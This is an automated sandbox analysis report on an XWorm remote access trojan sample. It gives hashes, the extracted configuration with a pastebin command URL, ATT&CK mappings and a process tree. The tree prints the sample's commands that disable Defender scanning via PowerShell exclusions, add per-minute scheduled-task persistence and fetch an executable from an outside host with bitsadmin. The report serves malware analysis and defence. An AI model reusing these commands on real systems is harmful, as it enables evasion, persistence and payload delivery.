xworm | c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
24-01-2025 05:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e.exe
Size

5.0MB
MD5

d4d28f2c6fd9af9ee5a3be30f9ab913b
SHA1

be4264bceaff957ff799b73ebc2479f0fc794815
SHA256

c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e
SHA512

7eed5b6d3420c930a07aee500e086ec61fd33099cd641a2efe7664081c0e5fdab4d1ad2b4835edcbe3e6722d44e60a75119a2900cfd00b7c182b20f379d7a977
SSDEEP

98304:6l1z3/RZ58MoFyQbbpaR2p1AU6cBSdOWWzSPfEIeGLGIQaW5tqwZ0ch1+NXHKgv3:Y1z5Z58MQJe2PAU6cBSkWWzaETGDW/t

Score

10^/10

xworm discovery dropper execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

EEarXqazEvX73BCq

Attributes

Install_directory
%AppData%
install_file
Chrome Update.exe
pastebin_url
https://pastebin.com/raw/RPPi3ByL

aes.plain

Signatures

Detect Xworm Payload 6 IoCs

resource	yara_rule
behavioral2/files/0x000c000000023b17-6.dat	family_xworm
behavioral2/memory/5092-16-0x0000000000A90000-0x0000000000ABC000-memory.dmp	family_xworm
behavioral2/files/0x000a000000023b7b-20.dat	family_xworm
behavioral2/files/0x000a000000023b7c-30.dat	family_xworm
behavioral2/memory/1804-36-0x0000000000140000-0x000000000016E000-memory.dmp	family_xworm
behavioral2/memory/232-41-0x00000000001A0000-0x00000000001C8000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3416	powershell.exe
1076	powershell.exe
2876	powershell.exe
2120	powershell.exe
1368	powershell.exe
4988	powershell.exe
3844	powershell.exe
3504	powershell.exe
1292	powershell.exe
2512	powershell.exe
4760	powershell.exe
392	powershell.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
984	bitsadmin.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Chrome Update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	OneDrive.exe

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk	OneDrive.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk	OneDrive.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update.lnk	Chrome Update.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update.lnk	Chrome Update.exe

Executes dropped EXE 10 IoCs

pid	Process
5092	Chrome Update.exe
1804	msedge.exe
232	OneDrive.exe
3116	TOPHERC.exe
2292	OneDrive.exe
4564	msedge.exe
3588	Chrome Update.exe
628	OneDrive.exe
716	msedge.exe
1372	Chrome Update.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chrome Update = "C:\\Users\\Admin\\AppData\\Roaming\\Chrome Update.exe"	Chrome Update.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\OneDrive.exe"	OneDrive.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
50	pastebin.com
129	pastebin.com
133	pastebin.com
44	pastebin.com
164	pastebin.com
176	pastebin.com
42	pastebin.com
92	pastebin.com
105	pastebin.com
98	pastebin.com
154	pastebin.com
26	pastebin.com
58	pastebin.com
93	pastebin.com
117	pastebin.com
137	pastebin.com
156	pastebin.com
152	pastebin.com
29	pastebin.com
97	pastebin.com
143	pastebin.com
51	pastebin.com
160	pastebin.com
43	pastebin.com
45	pastebin.com
139	pastebin.com
144	pastebin.com
100	pastebin.com
135	pastebin.com
172	pastebin.com
69	pastebin.com
87	pastebin.com
88	pastebin.com
112	pastebin.com
159	pastebin.com
173	pastebin.com
39	pastebin.com
86	pastebin.com
91	pastebin.com
141	pastebin.com
147	pastebin.com
151	pastebin.com
174	pastebin.com
120	pastebin.com
123	pastebin.com
149	pastebin.com
158	pastebin.com
167	pastebin.com
177	pastebin.com
52	pastebin.com
80	pastebin.com
134	pastebin.com
181	pastebin.com
68	pastebin.com
75	pastebin.com
119	pastebin.com
41	pastebin.com
46	pastebin.com
60	pastebin.com
146	pastebin.com
180	pastebin.com
15	pastebin.com
47	pastebin.com
118	pastebin.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TOPHERC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1288	schtasks.exe
4964	schtasks.exe
448	schtasks.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
4988	powershell.exe
4988	powershell.exe
2512	powershell.exe
2512	powershell.exe
3844	powershell.exe
3844	powershell.exe
3504	powershell.exe
3504	powershell.exe
4760	powershell.exe
4760	powershell.exe
3416	powershell.exe
3416	powershell.exe
1076	powershell.exe
1076	powershell.exe
2876	powershell.exe
2876	powershell.exe
2120	powershell.exe
2120	powershell.exe
392	powershell.exe
392	powershell.exe
1292	powershell.exe
1292	powershell.exe
1368	powershell.exe
1368	powershell.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	5092	Chrome Update.exe
Token: SeDebugPrivilege	1804	msedge.exe
Token: SeDebugPrivilege	232	OneDrive.exe
Token: SeDebugPrivilege	4988	powershell.exe
Token: SeDebugPrivilege	2512	powershell.exe
Token: SeDebugPrivilege	3844	powershell.exe
Token: SeDebugPrivilege	3504	powershell.exe
Token: SeDebugPrivilege	4760	powershell.exe
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeDebugPrivilege	1076	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	392	powershell.exe
Token: SeDebugPrivilege	1292	powershell.exe
Token: SeDebugPrivilege	1368	powershell.exe
Token: SeDebugPrivilege	2292	OneDrive.exe
Token: SeDebugPrivilege	4564	msedge.exe
Token: SeDebugPrivilege	3588	Chrome Update.exe
Token: SeDebugPrivilege	628	OneDrive.exe
Token: SeDebugPrivilege	716	msedge.exe
Token: SeDebugPrivilege	1372	Chrome Update.exe

Suspicious use of WriteProcessMemory 45 IoCs

description	pid	Process	procid_target
PID 3340 wrote to memory of 5092	3340	c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e.exe	85
PID 3340 wrote to memory of 5092	3340	c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e.exe	85
PID 3340 wrote to memory of 1204	3340	c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e.exe	86
PID 3340 wrote to memory of 1204	3340	c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e.exe	86
PID 3340 wrote to memory of 1204	3340	c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e.exe	86
PID 3340 wrote to memory of 1804	3340	c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e.exe	87
PID 3340 wrote to memory of 1804	3340	c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e.exe	87
PID 3340 wrote to memory of 232	3340	c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e.exe	88
PID 3340 wrote to memory of 232	3340	c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e.exe	88
PID 3340 wrote to memory of 3116	3340	c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e.exe	89
PID 3340 wrote to memory of 3116	3340	c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e.exe	89
PID 3340 wrote to memory of 3116	3340	c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e.exe	89
PID 1204 wrote to memory of 984	1204	mshta.exe	90
PID 1204 wrote to memory of 984	1204	mshta.exe	90
PID 1204 wrote to memory of 984	1204	mshta.exe	90
PID 5092 wrote to memory of 4988	5092	Chrome Update.exe	94
PID 5092 wrote to memory of 4988	5092	Chrome Update.exe	94
PID 1804 wrote to memory of 2512	1804	msedge.exe	96
PID 1804 wrote to memory of 2512	1804	msedge.exe	96
PID 232 wrote to memory of 3844	232	OneDrive.exe	98
PID 232 wrote to memory of 3844	232	OneDrive.exe	98
PID 5092 wrote to memory of 3504	5092	Chrome Update.exe	100
PID 5092 wrote to memory of 3504	5092	Chrome Update.exe	100
PID 1804 wrote to memory of 4760	1804	msedge.exe	102
PID 1804 wrote to memory of 4760	1804	msedge.exe	102
PID 232 wrote to memory of 3416	232	OneDrive.exe	104
PID 232 wrote to memory of 3416	232	OneDrive.exe	104
PID 5092 wrote to memory of 1076	5092	Chrome Update.exe	106
PID 5092 wrote to memory of 1076	5092	Chrome Update.exe	106
PID 1804 wrote to memory of 2876	1804	msedge.exe	108
PID 1804 wrote to memory of 2876	1804	msedge.exe	108
PID 232 wrote to memory of 2120	232	OneDrive.exe	110
PID 232 wrote to memory of 2120	232	OneDrive.exe	110
PID 5092 wrote to memory of 392	5092	Chrome Update.exe	112
PID 5092 wrote to memory of 392	5092	Chrome Update.exe	112
PID 232 wrote to memory of 1292	232	OneDrive.exe	114
PID 232 wrote to memory of 1292	232	OneDrive.exe	114
PID 5092 wrote to memory of 1288	5092	Chrome Update.exe	116
PID 5092 wrote to memory of 1288	5092	Chrome Update.exe	116
PID 1804 wrote to memory of 1368	1804	msedge.exe	118
PID 1804 wrote to memory of 1368	1804	msedge.exe	118
PID 232 wrote to memory of 4964	232	OneDrive.exe	121
PID 232 wrote to memory of 4964	232	OneDrive.exe	121
PID 1804 wrote to memory of 448	1804	msedge.exe	123
PID 1804 wrote to memory of 448	1804	msedge.exe	123

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e.exe
"C:\Users\Admin\AppData\Local\Temp\c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3340
- C:\Users\Admin\AppData\Roaming\Chrome Update.exe
  "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4988
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:392
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1288
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1204
- - C:\Windows\SysWOW64\bitsadmin.exe
    "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://spyderrock.com/xkdg5397-run.exe C:\Users\Admin\AppData\Local\Temp\Notify.exe
    3⤵
    - Download via BitsAdmin
    - System Location Discovery: System Language Discovery
    PID:984
- C:\Users\Admin\AppData\Roaming\msedge.exe
  "C:\Users\Admin\AppData\Roaming\msedge.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2512
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1368
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:448
- C:\Users\Admin\AppData\Roaming\OneDrive.exe
  "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3844
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3416
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2120
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1292
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4964
- C:\Users\Admin\AppData\Roaming\TOPHERC.exe
  "C:\Users\Admin\AppData\Roaming\TOPHERC.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3116

C:\ProgramData\OneDrive.exe
C:\ProgramData\OneDrive.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2292

C:\Users\Admin\AppData\Local\msedge.exe
C:\Users\Admin\AppData\Local\msedge.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4564

C:\Users\Admin\AppData\Roaming\Chrome Update.exe
"C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3588

C:\ProgramData\OneDrive.exe
C:\ProgramData\OneDrive.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:628

C:\Users\Admin\AppData\Local\msedge.exe
C:\Users\Admin\AppData\Local\msedge.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:716

C:\Users\Admin\AppData\Roaming\Chrome Update.exe
"C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

BITS Jobs

T1197

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OneDrive.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
574ff64bf76afb475881c1f935f0eed4

SHA1
4d4f7d308cd3777d2cc6f4e26aa57f341c164565

SHA256
2a1b2a0074d16b55261614f5778395013537a482758e1674c6c64dda558410ce

SHA512
285677ef1e36e04cddfd00f4cd142da66790f5d587aba414287fea18a499af820c6bb18bb2d8f197a724e13fb812bd3c2421710c782c3f6b96b0dd5dd8c5316d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ed1a9737643e7b5797cb55f19c282cff

SHA1
e8879704e357550605aeb6dc5d78998dcb17dedf

SHA256
2d8005cbeca6ceab00890952b765bca97e9bd5d0780f23520d68c88eb0256742

SHA512
42647460abdd4a7fb02c091604089a1e7c717d09f303386ffd5d5ce81622d30b4ba60a4e8e242545f27e79cad5d0c8d4e1a16272e029ba61912a9b32e629e1a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ef8de8ce852cb17de112bd99970aa2b5

SHA1
d528653b1a542f39231b838ee956b33680e21209

SHA256
5c4701acec856d3841a4cac77d619744923ebe8c71656fa14bad261ea6c9f6c3

SHA512
04ff07815da045345531fdff5557bda1472e7b727a6a0e2b7fde641d587081aa2421f4f56aac9cb85333985d6c0bbd1d44dc1758c17db86e0852a33ff96f4971

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
04f1d68afbed6b13399edfae1e9b1472

SHA1
8bfdcb687a995e4a63a8c32df2c66dc89f91a8b0

SHA256
f358f33a42122e97c489fad7bbc8beab2eb42d42e4ec7fce0dd61fe6d8c0b8de

SHA512
30c5e72a8134992094d937d2588f7a503b1d6407d11afe0265b7c8b0ce14071925e5caed13fc4f9c28705df4c7aed3601f81b007048b148af274d7784aa5fb75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
585572d6c9635af67371c9938f6a61f6

SHA1
f60dd9c8063368e64daea4ac9c5cf652d62a16d3

SHA256
38d206681883e94b50573c9fd8a12cb6ca8c90c6f98cbca844a6c37d3b1c1823

SHA512
8489f68b7b44bad54d84402ce0ed5845d77c8d5417b1fb20315506bd824d8892e8c7eb9153dacc4ca2639d26e28360ab36ed25ae1a66e2a9047df45e309281e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ba169f4dcbbf147fe78ef0061a95e83b

SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jwc0p131.uue.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome Update.exe

Filesize
152KB

MD5
16cdd301591c6af35a03cd18caee2e59

SHA1
92c6575b57eac309c8664d4ac76d87f2906e8ef3

SHA256
11d55ac2f9070a70d12f760e9a6ee75136eca4bf711042acc25828ddda3582c8

SHA512
a44402e5e233cb983f7cfd9b81bc542a08d8092ffa4bd970fc25fe112355643506d5dfee0dd76f2e79b983df0fde67bfc50aabb477492a7596e38081e4083476

Download Submit
C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta

Filesize
844B

MD5
3f8a283abe6fe28a7d217c8105041426

SHA1
0283cd67e7cc0a99eeae3c3dea69716a6ac75bb1

SHA256
333c439c84ccbcab11dd9cc7f4d90596c5b65caf1164e8a908e61aa0222916b1

SHA512
bc5f8f256356c689953516877f8b7895fb1efe587feabdddf0e1524d0b22e3dcb89e0e654d19d0c314c6a376a0e7594965178a353d147ea98c43d3d5976f1846

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive.exe

Filesize
140KB

MD5
a1cd6f4a3a37ed83515aa4752f98eb1d

SHA1
7f787c8d72787d8d130b4788b006b799167d1802

SHA256
5cbcc0a0c1d74cd54ac999717b0ff0607fe6ed02cca0a3e0433dd94783cfec65

SHA512
9489287e0b4925345fee05fe2f6e6f12440af1425ef397145e32e6f80c7ae98b530e42002d92dc156643f9829bc8a3b969e855cecd2265b6616c4514eed00355

Download Submit
C:\Users\Admin\AppData\Roaming\TOPHERC.exe

Filesize
4.2MB

MD5
79f2fd33a188ff47216b4f4dd4552582

SHA1
16e40e0a1fed903fec20cd6cd600e3a2548881ad

SHA256
cc45d38fa00c5aeb33bdf842166460117b5e70b0b4fcf5bb6ef9747ec0b0575f

SHA512
caa33702fdc7e480a6093d2af035f860044a4e960fd6e5a4b91d6019f2c3d4c235d9e95734e6b54ea2a88af4e96bf72a54d81b2a70c1f64e76dcd202891905f2

Download Submit
C:\Users\Admin\AppData\Roaming\msedge.exe

Filesize
166KB

MD5
aee20d80f94ae0885bb2cabadb78efc9

SHA1
1e82eba032fcb0b89e1fdf937a79133a5057d0a1

SHA256
498eb55b3fb4c4859ee763a721870bb60ecd57e99f66023b69d8a258efa3af7d

SHA512
